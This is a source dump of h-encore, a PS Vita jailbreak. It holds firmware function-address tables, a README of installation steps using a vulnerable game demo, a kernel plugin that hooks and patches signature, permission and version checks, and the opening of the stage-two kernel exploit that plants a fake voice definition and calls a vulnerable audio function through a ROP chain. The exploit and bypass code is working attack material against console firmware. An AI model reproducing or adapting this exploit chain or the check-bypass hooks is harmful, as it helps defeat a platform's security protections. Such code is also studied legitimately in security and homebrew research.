182 | 
183 | // SceNpTrophy
184 | .equ sceNpTrophyInit, 0x8102fb94
185 | .equ sceNpTrophyCreateHandle, 0x8102fba4
186 | .equ sceNpTrophyDestroyContext, 0x8102fbb4
187 | .equ sceNpTrophyUnlockTrophy, 0x8102fbc4
188 | .equ sceNpTrophyGetGameInfo, 0x8102fbd4
189 | .equ sceNpTrophyTerm, 0x8102fbe4
190 | .equ sceNpTrophyCreateContext, 0x8102fbf4
191 | .equ sceNpTrophyGetTrophyUnlockState, 0x8102fc04
192 | .equ sceNpTrophyAbortHandle, 0x8102fc14
193 | .equ sceNpTrophyDestroyHandle, 0x8102fc24
194 | 
195 | // SceNpManager
196 | .equ sceNpInit, 0x8102fc34
197 | .equ sceNpTerm, 0x8102fc44
198 | 
199 | // SceAvPlayer
200 | .equ sceAvPlayerIsActive, 0x8102fc54
201 | .equ sceAvPlayerInit, 0x8102fc64
202 | .equ sceAvPlayerClose, 0x8102fc74
203 | .equ sceAvPlayerGetVideoData, 0x8102fc84
204 | .equ sceAvPlayerGetAudioData, 0x8102fc94
205 | .equ sceAvPlayerAddSource, 0x8102fca4
206 | .equ sceAvPlayerStop, 0x8102fcb4
207 | 
208 | // SceLibc
209 | .equ strstr, 0x8102fcc4
210 | .equ abort, 0x8102fcd4
211 | .equ __cxa_atexit, 0x8102fce4
212 | .equ _sceLdTlsRegisterModuleInfo, 0x8102fcf4
213 | .equ free, 0x8102fd04
214 | .equ memset, 0x8102fd14
215 | .equ memcpy, 0x8102fd24
216 | .equ malloc, 0x8102fd34
217 | .equ exit, 0x8102fd44
218 | .equ fgetwc, 0x8102fd54
219 | .equ strlen, 0x8102fd64
220 | .equ abs, 0x8102fd74
221 | .equ printf, 0x8102fd84
222 | .equ strncpy, 0x8102fd94
223 | .equ snprintf, 0x8102fda4
224 | .equ wcslen, 0x8102fdb4
225 | .equ memalign, 0x8102fdc4
226 | .equ __cxa_set_dso_handle_main, 0x8102fdd4
227 | .equ rand, 0x8102fde4
228 | .equ strncmp, 0x8102fdf4
229 | .equ fclose, 0x8102fe04
230 | .equ fopen, 0x8102fe14
231 | 
232 | // SceLibm
233 | .equ _FSinx, 0x8102fe24
234 | 
235 | // SceLibstdcxx
236 | .equ _ZdlPv, 0x8102fe34
237 | .equ _Znwj, 0x8102fe44
238 | 
239 | // SceLibKernel
240 | .equ sceKernelUnlockLwMutex, 0x8102fe54
241 | .equ sceClibMemcpy, 0x8102fe64
242 | .equ sceKernelDeleteLwMutex, 0x8102fe74
243 | .equ __sce_aeabi_idiv0, 0x8102fe84
244 | .equ sceKernelLockLwMutex, 0x8102fe94
245 | .equ sceKernelGetProcessTime, 0x8102fea4
246 | .equ sceClibMemset, 0x8102feb4
247 | .equ sceIoOpen, 0x8102fec4
248 | .equ sceClibMemmove, 0x8102fed4
249 | .equ sceKernelCreateEventFlag, 0x8102fee4
250 | .equ sceIoLseek, 0x8102fef4
251 | .equ sceIoGetstat, 0x8102ff04
252 | .equ sceKernelCreateThread, 0x8102ff14
253 | .equ sceKernelGetThreadExitStatus, 0x8102ff24
254 | .equ sceKernelCreateLwMutex, 0x8102ff34
255 | .equ sceKernelWaitThreadEnd, 0x8102ff44
256 | .equ sceKernelStartThread, 0x8102ff54
257 | .equ sceKernelLoadStartModule, 0x8102ff64
258 | 
259 | // SceIofilemgr
260 | .equ sceIoLseek32, 0x8102ff74
261 | .equ sceIoClose, 0x8102ff84
262 | .equ sceIoRead, 0x8102ff94
263 | 
264 | // SceProcessmgr
265 | .equ sceKernelPowerTick, 0x8102ffa4
266 | 
267 | // SceSysmem
268 | .equ sceKernelFindMemBlockByAddr, 0x8102ffb4
269 | .equ sceKernelFreeMemBlock, 0x8102ffc4
270 | .equ sceKernelGetMemBlockBase, 0x8102ffd4
271 | .equ sceKernelAllocMemBlock, 0x8102ffe4
272 | 
273 | // SceThreadmgr
274 | .equ sceKernelDeleteThread, 0x8102fff4
275 | .equ sceKernelExitDeleteThread, 0x81030004
276 | .equ sceKernelDelayThread, 0x81030014
277 | .equ sceKernelDeleteEventFlag, 0x81030024
278 | .equ sceKernelSetEventFlag, 0x81030034
279 | 
280 | // SceThreadmgrCoredumpTime
281 | .equ sceKernelExitThread, 0x81030044
282 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # h-encore
  2 | 
  3 | *h-encore*, where *h* stands for hacks and homebrews, is the second public jailbreak for the *PS Vita™* which supports the newest firmwares 3.65, 3.67 and 3.68. It allows you to make kernel- and user-modifications, change the clock speed, install plugins, run homebrews and much more.
  4 | 
  5 | ## Write-up
  6 | 
  7 | A technical explanation of the *h-encore* exploit chain is available [here](https://theofficialflow.github.io/2018/09/11/h-encore.html).
  8 | 
  9 | ## Changelog
 10 | 
 11 | #### Changelog h-encore 2.0:
 12 | 
 13 | - Added ability to auto-exit and bypass the bootstrap menu. You can force launching the bootstrap menu by holding R while launching *h-encore*).
 14 | - Added ability to personalize the savedata in order to get rid of the trophy warning.
 15 | - Added confirmation dialog for `Reset taiHEN config.txt` option.
 16 | - Updated default spoof version to 3.70.
 17 | - Updated kernel ROP chain to use fewer and better gadgets.
 18 | 
 19 | ## Requirements
 20 | 
 21 | - Your device must be on firmware 3.65, 3.67 or 3.68. **Firmware 3.69 and higher are not supported**. If you're on a lower firmware, please decide carefully to what firmware you want to update, then search for a trustable guide on [/r/vitahacks](https://www.reddit.com/r/vitahacks/).
 22 | - If your device is a phat OLED model, you need a Memory Card in order to install. There's no need for a Memory Card on Slim/PS TV models, since they already provide an Internal Storage. Make sure you have got at least `270 MB` of free space.
 23 | - Your device must be linked to any PSN account (it doesn't need to be activated though). If it is not, then you must restore default settings in order to sign in.
 24 | 
 25 | ## Installation
 26 | 
 27 | Note that the following guide is for advanced users and a bit more complicated than the previous hack that only required you to visit a website. If you don't understand the guide below or how to use these tools, you should not file an issue here, but rather seek help on [/r/vitahacks](https://www.reddit.com/r/vitahacks/comments/8v9vl7/biweekly_questions_thread_edition_23_hencore/) (check for duplicated questions first!) or use the [easy installer](https://github.com/soarqin/finalhe) (which isn't maintained by me).
 28 | 
 29 | 1. Download [h-encore](https://github.com/TheOfficialFloW/h-encore/releases/download/v2.0/h-encore.zip) and extract it on your computer.
 30 | 
 31 | 2. Download and install [qcma](https://codestation.github.io/qcma/), [psvimgtools](https://github.com/yifanlu/psvimgtools) and [pkg2zip](https://github.com/mmozeiko/pkg2zip) (check the releases section for the binaries).  
 32 |    If you don't know where to put psvimgtools and pkg2zip binaries, just put them in the `h-encore` folder.
 33 | 
 34 | 3. Download the vulnerable DRM-free demo of [bitter smile](http://ares.dl.playstation.net/cdn/JP0741/PCSG90096_00/xGMrXOkORxWRyqzLMihZPqsXAbAXLzvAdJFqtPJLAZTgOcqJobxQAhLNbgiFydVlcmVOrpZKklOYxizQCRpiLfjeROuWivGXfwgkq.pkg) (yes, that's the user entry point).
 35 | 
 36 | 4. Extract the demo using this command in terminal/cmd:
 37 |    ```
 38 |    pkg2zip -x PATH_OF_PKG
 39 |    ```
 40 | 
 41 |    This will output the files to `app/PCSG90096`.
 42 | 
 43 | 5. Copy the contents of the output `app/PCSG90096` to the folder `h-encore/app/ux0_temp_game_PCSG90096_app_PCSG90096` (such that the files `eboot.bin` and `VITA_PATH.TXT` are within the same folder).
 44 | 
 45 | 6. Copy the license file `app/PCSG90096/sce_sys/package/temp.bin` to the folder  
 46 |    `h-encore/license/ux0_temp_game_PCSG90096_license_app_PCSG90096` and rename the just pasted file `temp.bin` to ` 6488b73b912a753a492e2714e9b38bc7.rif`. Be careful with the file extension, it should not be `.rif.bin`. Again, this file should be in the same folder as `VITA_PATH.TXT`.
 47 | 
 48 | 7. Start qcma and within the qcma settings set the option `Use this version for updates` to `FW 0.00 (Always up-to-date)` to spoof the System Software check.
 49 | 
 50 | 8. Launch Content Manager on your PS Vita and connect it to your computer, where you then need to select `PC -> PS Vita System`, and after that you select `Applications`. If you see an error message about System Software, you should simply reboot your device to solve it (if this doesn't solve, then put your device into airplane mode and reboot). If this does still not work, then alternatively set DNS to `212.47.229.76` to block updates.
 51 |    This should create a folder at `PS Vita/APP/xxxxxxxxxxxxxxxx` on your computer (see qcma settings where this folder is), where the folder `xxxxxxxxxxxxxxxx` represents the AID (account ID that is 16 characters long) that you need to insert [here](http://cma.henkaku.xyz/). If the AID is valid, it will yield a key that you can now use to encrypt the demo.
 52 | 
 53 | 9. Change directory to the `h-encore` folder in terminal/cmd and use the key to encrypt all folders using (make sure you don't confuse the key with the AID, the key is 64 characters long!):
 54 |    ```
 55 |    psvimg-create -n app -K YOUR_KEY app PCSG90096/app
 56 |    psvimg-create -n appmeta -K YOUR_KEY appmeta PCSG90096/appmeta
 57 |    psvimg-create -n license -K YOUR_KEY license PCSG90096/license
 58 |    psvimg-create -n savedata -K YOUR_KEY savedata PCSG90096/savedata
 59 |    ```
 60 | 
 61 |     The folder `h-encore/PCSG90096` should then contain `sce_sys` and all 4 folders from above, and within these folders you should find files called `X.psvimg` and `X.psvmd`, where `X` has the same name as the folder. Backup this folder, since if everything has been done correctly, you don't need to redo all the steps to install it onto another device with the same PSN account.
 62 | 
 63 | 10. Copy the folder `h-encore/PCSG90096` to `PS Vita/APP/xxxxxxxxxxxxxxxx/PCSG90096` and then select `Refresh database` in qcma.
 64 | 
 65 | 11. The *h-encore* bubble with a size of around `243 MB` should now appear in the Content Manager and that's what you finally need to transfer to your PS Vita. If the size does not match or you get the error `C2-12858-4`, then it's because you did not do it correctly! Please re-read the instructions more carefully then. If you get the error `You can only copy applications that your account is the owner of`, then it's because you have used an AID that is not of your account, go back to step 8.
 66 | 
 67 | 12. Launch *h-encore* to exploit your device (if a message about trophies appears, simply click yes).
 68 |     The screen should first flash white, then purple, and finally open a menu called *h-encore bootstrap menu* where you can download [VitaShell](https://github.com/TheOfficialFloW/VitaShell) and install [HENkaku](https://github.com/henkaku).
 69 |     If it prompts the error `Cannot start this application. C0-11136-2`, then it's because you did not do step 6. correctly.
 70 | 
 71 | 13. Enjoy. Note that you have to relaunch the exploit everytime you reboot or shutdown your device. Of course if you only put your device into standby mode, you don't need to relaunch.
 72 | 
 73 | ## Updating to h-encore 2.0
 74 | 
 75 | You can update *h-encore* by following the installation guide above, or following these steps (*h-encore* must already be installed).
 76 | 
 77 | 1. Download [h-encore's system.dat](https://github.com/TheOfficialFloW/h-encore/releases/download/v2.0/system.dat).
 78 | 2. Enable `Unsafe Homebrews` under `HENkaku Settings` in the Settings application to grant VitaShell full permission.
 79 | 3. Launch VitaShell and navigate to `ux0:user/00/savedata/`.
 80 | 4. Press triangle on the folder `PCSG90096` and select `Open decrypted` (you should NOT see the folder `sce_pfs` within this folder when opened decrypted).
 81 | 5. Copy the downloaded `system.dat` to `ux0:user/00/savedata/PCSG90096/system.dat`.
 82 | 6. Launch *h-encore* while holding R and select `Install HENkaku` in the bootstrap menu.
 83 | 7. Done.
 84 | 
 85 | ## FAQ
 86 | 
 87 | ### Exploit
 88 | 
 89 | - "When I launch *h-encore*, it stays at a white screen." - Due to the nature of the kernel exploit, this can sometimes happen. If it stays white for more than 5 seconds, you can simply close the application which will result in a crash and your device will be rebooted or shutdown after 10 seconds. If it doesn't, hold the power button down for over 30 seconds to force a shutdown. Then try the exploit again. The success rate of the kernel exploit should be at 80%. If I find time I will eventually try to improve the success rate.
 90 | - "When I launch *h-encore*, it flashes white quickly and then crashes." - Again, this is due to how the kernel exploit works.
 91 | - "I get a C2-12828-1 error when launching *h-encore*" - This does sometimes (but very rarely) happen. Just retry the exploit.
 92 | - "When I launch *h-encore*, it launches the bitter smile demo instead." - Your savedata is either corrupted or not installed correctly, please follow the installation guide above to reinstall it.
 93 | - "I have installed a bad plugin and launching *h-encore* doesn't work anymore, what should I do?" - You can either reset taiHEN config.txt or skip plugins loading by holding the L trigger while exiting the *h-encore bootstrap menu*.
 94 | 
 95 | ### HENkaku Settings
 96 | 
 97 | - "I don't see all folders in VitaShell." - Launch the Settings application and select `HENkaku Settings`, then select `Enable unsafe homebrews`. This will grant you full permission in VitaShell.
 98 | - "I can't find the HENkaku Settings." - Launch the exploit and reset taiHEN config.txt and reinstall HENkaku.
 99 | 
100 | ### enso/permanent hack
101 | 
102 | - "Can I install enso on 3.67 or 3.68?" - Not on these firmwares, but you can downgrade to firmware 3.65 using [modoru](https://github.com/TheOfficialFloW/modoru) and then install enso.
103 | - "Can I install enso on 3.65?" - Yes, you can use *h-encore* to hack your device and then install the permanent hack using [this](https://github.com/TheOfficialFloW/enso/releases).
104 | 
105 | ### Compatibility
106 | 
107 | - "Are Adrenaline/NoNpDrm/Download Enabler supported on 3.65/3.67/3.68?" - Yes, check them in my repositories.
108 | - "Can I use SD2VITA using this hack?" - Yes, I have made a pull request on [gamecard-microsd](https://github.com/xyzz/gamecard-microsd) that fixed the freeze when using it without enso. If you're using an other plugin and it freezes on exitting *h-encore bootstrap menu*, then there's the trick where you can simply press the PS Button and return back to finish the boot process.
109 | - "Can I use psvsd using this hack?" - Yes, people confirmed that it is working finely.
110 | - "Does this work, does that work? Is this compatible, is that compatible?" - I don't know, and it is not my task to update these tools for you, so don't dare and file an issue here.
111 | 
112 | ### General
113 | 
114 | - "Can I switch the PSN account after having *h-encore* installed?" - Yes, since the demo is DRM-free it does not depend on your account.
115 | - "Are there any risks involved in using *h-encore*?" - No, since it does not modify the OS, but only insert temporary patches into the system.
116 | - "Can I install it without USB connection?" - You can also connect your PS Vita with your computer using Wi-Fi (there's an option in the Content Manager).
117 | - "How do I get into bootstrap menu?" - launch h-encore while holding the R trigger.
118 | 
119 | ## Donation
120 | 
121 | If you like my work and want to support future projects, you can make a donation:
122 | 
123 | - via bitcoin `361jRJtjppd2iyaAhBGjf9GUCWnunxtZ49`
124 | - via [paypal](https://www.paypal.me/flowsupport/20)
125 | - via [patreon](https://www.patreon.com/TheOfficialFloW)
126 | 
127 | Thank you!
128 | 
129 | ## Credits
130 | 
131 | - Thanks to Freakler for finding the crash in the demo and designing the *h-encore* icon.
132 | - Thanks to molecule for their initial work on the PS Vita.
133 | - Thanks to xyz for giving me some tips on choosing an exploit target.
134 | - Thanks to Davee and Proxima for http://cma.henkaku.xyz/.
135 | - Thanks to yifanlu for psvimgtools.
136 | - Thanks to codestation for qcma.
137 | - Thanks to mmozeiko for pkg2vita.
138 | - Thanks to the PS Vita hacking community.
139 | - Thanks to Sony for this awesome device.
140 | 


--------------------------------------------------------------------------------
/plugin/kernel.c:
--------------------------------------------------------------------------------
  1 | #include <psp2kern/kernel/modulemgr.h>
  2 | #include <psp2kern/kernel/sysmem.h>
  3 | #include <psp2kern/kernel/cpu.h>
  4 | #include <psp2kern/kernel/threadmgr.h>
  5 | #include <psp2kern/io/fcntl.h>
  6 | #include <stdio.h>
  7 | #include <string.h>
  8 | #include <taihen.h>
  9 | #include "henkaku.h"
 10 | #include "config.h"
 11 | 
 12 | #define OFFSET_PATCH_ARG (168)
 13 | #define OFFSET_PATCH_AUTHID (152)
 14 | 
 15 | typedef struct {
 16 |   uint32_t magic;                 /* 53434500 = SCE\0 */
 17 |   uint32_t version;               /* header version 3*/
 18 |   uint16_t sdk_type;              /* */
 19 |   uint16_t header_type;           /* 1 self, 2 unknown, 3 pkg */
 20 |   uint32_t metadata_offset;       /* metadata offset */
 21 |   uint64_t header_len;            /* self header length */
 22 |   uint64_t elf_filesize;          /* ELF file length */
 23 |   uint64_t self_filesize;         /* SELF file length */
 24 |   uint64_t unknown;               /* UNKNOWN */
 25 |   uint64_t self_offset;           /* SELF offset */
 26 |   uint64_t appinfo_offset;        /* app info offset */
 27 |   uint64_t elf_offset;            /* ELF #1 offset */
 28 |   uint64_t phdr_offset;           /* program header offset */
 29 |   uint64_t shdr_offset;           /* section header offset */
 30 |   uint64_t section_info_offset;   /* section info offset */
 31 |   uint64_t sceversion_offset;     /* version offset */
 32 |   uint64_t controlinfo_offset;    /* control info offset */
 33 |   uint64_t controlinfo_size;      /* control info size */
 34 |   uint64_t padding;               
 35 | } __attribute__((packed)) self_header_t;
 36 | 
 37 | typedef struct {
 38 |   uint64_t authid;                /* auth id */
 39 |   uint32_t vendor_id;             /* vendor id */
 40 |   uint32_t self_type;             /* app type */
 41 |   uint64_t padding;               /* UNKNOWN */
 42 | } __attribute__((packed)) app_info_t;
 43 | 
 44 | static henkaku_config_t config;
 45 | 
 46 | static SceUID g_hooks[6];
 47 | 
 48 | static tai_hook_ref_t g_parse_headers_hook;
 49 | static int parse_headers_patched(int ctx, const void *headers, size_t len, void *args) {
 50 |   self_header_t *self;
 51 |   app_info_t *info;
 52 |   int ret;
 53 | 
 54 |   ret = TAI_CONTINUE(int, g_parse_headers_hook, ctx, headers, len, args);
 55 |   if (len >= sizeof(self_header_t) && len >= sizeof(app_info_t)) {
 56 |     self = (self_header_t *)headers;
 57 |     if (self->appinfo_offset <= len - sizeof(app_info_t)) {
 58 |       info = (app_info_t *)(headers + self->appinfo_offset);
 59 |       LOG("authid: 0x%llx\n", info->authid);
 60 |       if (ret < 0 && config.allow_unsafe_hb) {
 61 |         LOG("is homebrew!");
 62 |         if ((info->authid & 0xFFFFFFFFFFFFFFFCLL) == 0x2F00000000000000LL) {
 63 |           if (info->authid & 1) {
 64 |             // we just give extended permissions
 65 |             *(uint32_t *)(args + OFFSET_PATCH_ARG) = 0x40;
 66 |           }
 67 |         } else {
 68 |           // we give authid + extended permissions
 69 |           *(uint32_t *)(args + OFFSET_PATCH_ARG) = 0x40;
 70 |           *(uint64_t *)(args + OFFSET_PATCH_AUTHID) = info->authid;
 71 |         }
 72 |       }
 73 |     }
 74 |   }
 75 |   return ret;
 76 | }
 77 | 
 78 | static tai_hook_ref_t g_some_sysroot_check_hook;
 79 | static int some_sysroot_check_patched(void) {
 80 |   TAI_CONTINUE(int, g_some_sysroot_check_hook);
 81 |   return 1;
 82 | }
 83 | 
 84 | static tai_hook_ref_t g_some_process_check_patched_hook;
 85 | static int some_process_check_patched(void) {
 86 |   TAI_CONTINUE(int, g_some_process_check_patched_hook);
 87 |   return 0;
 88 | }
 89 | 
 90 | static tai_hook_ref_t g_some_power_auth_check_hook;
 91 | static int some_power_auth_check_patched(void) {
 92 |   // this function may be called in the process of looping
 93 |   // see: https://github.com/yifanlu/taiHEN/issues/12
 94 |   // for now, we mark this as a FIXME and do this check manually
 95 |   if (g_some_power_auth_check_hook) {
 96 |     TAI_CONTINUE(int, g_some_power_auth_check_hook);
 97 |   }
 98 |   return 1;
 99 | }
100 | 
101 | static tai_hook_ref_t g_sceKernelGetSystemSwVersion_hook;
102 | static int sceKernelGetSystemSwVersion_patched(SceKernelFwInfo *info) {
103 |   int ret;
104 |   int ver_major;
105 |   int ver_minor;
106 |   ret = TAI_CONTINUE(int, g_sceKernelGetSystemSwVersion_hook, info);
107 |   info->version = config.spoofed_version;
108 |   ver_major = ((config.spoofed_version >> 24) & 0xF) + 10 * (config.spoofed_version >> 28);
109 |   ver_minor = ((config.spoofed_version >> 16) & 0xF) + 10 * ((config.spoofed_version >> 20) & 0xF);
110 |   snprintf(info->versionString, 16, "%d.%02d", ver_major, ver_minor);
111 |   return ret;
112 | }
113 | 
114 | static tai_hook_ref_t g_sceSblUsGetSpkgInfo_hook;
115 | static int sceSblUsGetSpkgInfo_patched(int r0, uintptr_t out) {
116 |   int ver;
117 |   int ret;
118 |   ret = TAI_CONTINUE(int, g_sceSblUsGetSpkgInfo_hook, r0, out);
119 |   if (r0 == 1 || r0 == 9 || r0 == 10 || r0 == 21 || r0 == 22) {
120 |     ver = config.spoofed_version;
121 |     ksceKernelMemcpyKernelToUser(out+4, &ver, 4);
122 |   }
123 |   return ret;
124 | }
125 | 
126 | static int load_config_kernel(void) {
127 |   SceUID fd;
128 |   int rd;
129 |   fd = ksceIoOpen(CONFIG_PATH, SCE_O_RDONLY, 0);
130 |   if (fd < 0) {
131 |     fd = ksceIoOpen(OLD_CONFIG_PATH, SCE_O_RDONLY, 0);
132 |   }
133 |   if (fd >= 0) {
134 |     rd = ksceIoRead(fd, &config, sizeof(config));
135 |     ksceIoClose(fd);
136 |     if (rd == sizeof(config)) {
137 |       if (config.magic == HENKAKU_CONFIG_MAGIC) {
138 |         if (config.version >= 0) {
139 |           return 0;
140 |         } else {
141 |           LOG("config version too old");
142 |         }
143 |       } else {
144 |         LOG("config incorrect magic: %x", config.magic);
145 |       }
146 |     } else {
147 |       LOG("config not right size: %d", rd);
148 |     }
149 |   } else {
150 |     LOG("config file not found");
151 |   }
152 |   // default config
153 |   config.magic = HENKAKU_CONFIG_MAGIC;
154 |   config.version = HENKAKU_RELEASE;
155 |   config.use_psn_spoofing = 1;
156 |   config.allow_unsafe_hb = 0;
157 |   config.use_spoofed_version = 1;
158 |   config.spoofed_version = SPOOF_VERSION;
159 |   return 0;
160 | }
161 | 
162 | // user export
163 | int henkaku_reload_config(void) {
164 |   int state;
165 |   int tid;
166 |   int ret;
167 |   ENTER_SYSCALL(state);
168 |   tid = ksceKernelCreateThread("configwrite", (SceKernelThreadEntry)load_config_kernel, 64, 0x1000, 0, 0, NULL);
169 |   LOG("ksceKernelCreateThread: %x", tid);
170 |   ret = ksceKernelStartThread(tid, 0, NULL);
171 |   LOG("ksceKernelStartThread: %x", ret);
172 |   ksceKernelWaitThreadEnd(tid, &ret, NULL);
173 |   ksceKernelDeleteThread(tid);
174 |   EXIT_SYSCALL(state);
175 |   return ret;
176 | }
177 | 
178 | void _start() __attribute__ ((weak, alias ("module_start")));
179 | int module_start(SceSize argc, const void *args) {
180 |   SceUID shell_pid;
181 |   LOG("loading HENkaku config for kernel");
182 |   load_config_kernel();
183 |   // this hook enables extended permissions for unsafe homebrew + blocking unsafe homebrew if requested
184 |   g_hooks[0] = taiHookFunctionImportForKernel(KERNEL_PID, 
185 |                                               &g_parse_headers_hook, 
186 |                                               "SceKernelModulemgr", 
187 |                                               0x7ABF5135, // SceSblAuthMgrForKernel
188 |                                               0xF3411881, 
189 |                                               parse_headers_patched);
190 |   LOG("parse_headers_hook: %x", g_hooks[0]);
191 |   // the next two hooks enable dynarec by patching a system check and a process check
192 |   g_hooks[1] = taiHookFunctionExportForKernel(KERNEL_PID, 
193 |                                               &g_some_sysroot_check_hook, 
194 |                                               "SceSysmem", 
195 |                                               0x3691DA45, // SceSysrootForKernel
196 |                                               0xF8769E86, 
197 |                                               some_sysroot_check_patched);
198 |   LOG("some_sysroot_check_hook: %x", g_hooks[1]);
199 |   g_hooks[2] = taiHookFunctionExportForKernel(KERNEL_PID, 
200 |                                               &g_some_process_check_patched_hook, 
201 |                                               "SceSysmem", 
202 |                                               0x63A519E5, // SceSysmemForKernel
203 |                                               0xD514BB56, 
204 |                                               some_process_check_patched);
205 |   if (g_hooks[2] < 0) {
206 |     g_hooks[2] = taiHookFunctionExportForKernel(KERNEL_PID, 
207 |                                                 &g_some_process_check_patched_hook, 
208 |                                                 "SceSysmem", 
209 |                                                 0x02451F0F, // SceSysmemForKernel
210 |                                                 0x4E6D8BC3, 
211 |                                                 some_process_check_patched);
212 |   }
213 |   LOG("some_process_check_patched_hook: %x", g_hooks[2]);
214 |   // this hook patches an auth check in ScePower for enabling overclocking in safe homebrew
215 |   g_some_power_auth_check_hook = 0;
216 |   g_hooks[3] = taiHookFunctionImportForKernel(KERNEL_PID, 
217 |                                               &g_some_power_auth_check_hook, 
218 |                                               "ScePower", 
219 |                                               0x9AD8E213, // SceSblACMgrForDriver
220 |                                               0x8612B243, 
221 |                                               some_power_auth_check_patched);
222 |   LOG("some_power_auth_check_hook: %x", g_hooks[3]);
223 |   if (config.use_spoofed_version) {
224 |     // this hook spoofs the system version for the API access
225 |     g_hooks[4] = taiHookFunctionExportForKernel(KERNEL_PID, 
226 |                                                 &g_sceKernelGetSystemSwVersion_hook, 
227 |                                                 "SceKernelModulemgr", 
228 |                                                 0xD4A60A52, // SceModulemgrForDriver
229 |                                                 0x5182E212, 
230 |                                                 sceKernelGetSystemSwVersion_patched);
231 |     LOG("sceKernelGetSystemSwVersion_hook: %x", g_hooks[4]);
232 |     // this hook spoofs the system version for internal access
233 |     g_hooks[5] = taiHookFunctionExportForKernel(KERNEL_PID, 
234 |                                                 &g_sceSblUsGetSpkgInfo_hook, 
235 |                                                 "SceSblUpdateMgr", 
236 |                                                 0x31406C49, // SceSblSsUpdateMgr
237 |                                                 0x8E3EC2E1, 
238 |                                                 sceSblUsGetSpkgInfo_patched);
239 |     LOG("sceSblUsGetSpkgInfo_hook: %x", g_hooks[5]);
240 |   } else {
241 |     LOG("skipping version spoofing");
242 |   }
243 |   if (argc == 4) {
244 |     shell_pid = *(SceUID *)args;
245 |     LOG("loading shell plugins");
246 |     // normally this would be done automatically by taiHEN
247 |     // but since our exploit runs AFTER SceShell is loaded, 
248 |     // we have to do this manually
249 |     taiLoadPluginsForTitleForKernel(shell_pid, "main", 0);
250 |     LOG("shell plugins loaded");
251 |   }
252 |   return SCE_KERNEL_START_SUCCESS;
253 | }
254 | 
255 | int module_stop(SceSize argc, const void *args) {
256 |   taiHookReleaseForKernel(g_hooks[0], g_parse_headers_hook);
257 |   taiHookReleaseForKernel(g_hooks[1], g_some_sysroot_check_hook);
258 |   taiHookReleaseForKernel(g_hooks[2], g_some_process_check_patched_hook);
259 |   taiHookReleaseForKernel(g_hooks[3], g_some_power_auth_check_hook);
260 |   if (config.use_spoofed_version) {
261 |     taiHookReleaseForKernel(g_hooks[4], g_sceKernelGetSystemSwVersion_hook);
262 |     taiHookReleaseForKernel(g_hooks[5], g_sceSblUsGetSpkgInfo_hook);
263 |   }
264 |   return SCE_KERNEL_STOP_SUCCESS;
265 | }
266 | 


--------------------------------------------------------------------------------
/stage2/stage2.S:
--------------------------------------------------------------------------------
  1 | /* stage2.S -- implementation of the kernel exploit
  2 |  *
  3 |  * Copyright (C) 2018 TheFloW
  4 |  *
  5 |  * This software may be modified and distributed under the terms
  6 |  * of the MIT license.  See the LICENSE file for details.
  7 |  */
  8 | 
  9 | .include "../include/constants.S"
 10 | .include "../include/functions.S"
 11 | .include "../include/gadgets.S"
 12 | .include "../include/macros.S"
 13 | .include "krop.S"
 14 | 
 15 | // Kernel stack base start and step
 16 | .equ KSTACK_BASE_START,      0x1000
 17 | .equ KSTACK_BASE_STEP,       0x1000
 18 | 
 19 | // Layout for voice definition
 20 | .equ FAKE_COPYOUT_OFFSET,    0x40
 21 | .equ FAKE_COPYOUT_SIZE,      0xa0
 22 | .equ OVERWRITE_OFFSET,       0x40
 23 | .equ OVERWRITE_SIZE,         0x64
 24 | .equ FAKE_HEADER_OFFSET,     0xb0
 25 | .equ FAKE_HEADER_SIZE,       0x80
 26 | .equ PRESET_LIST_OFFSET,     0x130
 27 | 
 28 | // copyout params offset
 29 | .equ COPYOUT_PARAMS_OFFSET,  0xa0
 30 | 
 31 | // SceLibKernel offsets
 32 | .equ SCE_LIB_KERNEL_OFFSET,  -0xa4b7
 33 | .equ GET_MODULE_LIST_OFFSET, 0x675c
 34 | .equ GET_MODULE_INFO_OFFSET, 0x676c
 35 | .equ GET_THREAD_INFO_OFFSET, 0xa791
 36 | .equ DEVCTL_OFFSET,          0xa55d
 37 | 
 38 | // SceNgsUser offsets
 39 | .equ SYSTEM_GET_SIZE_OFFSET, 0x54d
 40 | .equ SYSTEM_INIT_OFFSET,     0x57d
 41 | .equ RACK_GET_SIZE_OFFSET,   0xb29
 42 | .equ RACK_INIT_OFFSET,       0xb65
 43 | .equ RACK_RELEASE_OFFSET,    0xda1
 44 | 
 45 | .macro set_preset i, src, size
 46 |   .set index, (\i) * 0x18
 47 |   .set offset, \src - (PRESET_LIST_OFFSET + index)
 48 |   call_vvv memset, voice_def_buf + PRESET_LIST_OFFSET + index, 0, 0x18
 49 |   store_vv offset, voice_def_buf + PRESET_LIST_OFFSET + index + 0x08 // nPresetDataOffset
 50 |   store_vv \size,  voice_def_buf + PRESET_LIST_OFFSET + index + 0x0c // uSizePresetData
 51 | .endm
 52 | 
 53 | .macro set_preset_dummy i, src, size
 54 |   .set index, (\i) * 0x18
 55 |   .set offset, \src - (PRESET_LIST_OFFSET + index)
 56 |   call_vvv memset, voice_def_buf + PRESET_LIST_OFFSET + index, 0, 0x18
 57 |   store_vv offset, voice_def_buf + PRESET_LIST_OFFSET + index + 0x00 // nNameOffset
 58 |   store_vv \size,  voice_def_buf + PRESET_LIST_OFFSET + index + 0x04 // uNameLength
 59 | .endm
 60 | 
 61 | .macro trigger_exploit
 62 |   // Plant fake voice definition into kernel stack
 63 |   load_call_vvvvvv sceIoDevctl, empty_string, 0, voice_def_buf, 0x3ff, NULL, 0
 64 | 
 65 |   // Determine memory requirement for rack
 66 |   load_call_lvv sceNgsRackGetRequiredMemorySize, sys_handle, rack_desc, buffer_info + 0x04
 67 | 
 68 |   // Allocate rack memory
 69 |   call_vl  memalign, 256, buffer_info + 0x04
 70 |   store_rv           ret, buffer_info + 0x00
 71 | 
 72 |   // Call vulnerable function
 73 |   load_call_lvvv sceNgsRackInit, sys_handle, buffer_info, rack_desc, rack_handle
 74 | 
 75 |   // Free rack memory
 76 |   call_l free, buffer_info + 0x00
 77 | 
 78 |   // Release rack handle
 79 |   load_call_lv sceNgsRackRelease, rack_handle, NULL
 80 | .endm
 81 | 
 82 | .global _start
 83 | _start:
 84 |   /** STAGE 1: Initialize framebuffer and ngs system **/
 85 | 
 86 |   // Terminate vdispThread so we can draw our own screen
 87 |   call_vv vdispSetState, vdispCtrl, VDISP_STATE_EXIT
 88 |   call_v  vdispEnd,      vdispCtrl
 89 | 
 90 |   // Allocate memory in cdram
 91 |   call_vvvv sceKernelAllocMemBlock,   empty_string, SCE_KERNEL_MEMBLOCK_TYPE_USER_CDRAM_RW, 0x200000, NULL
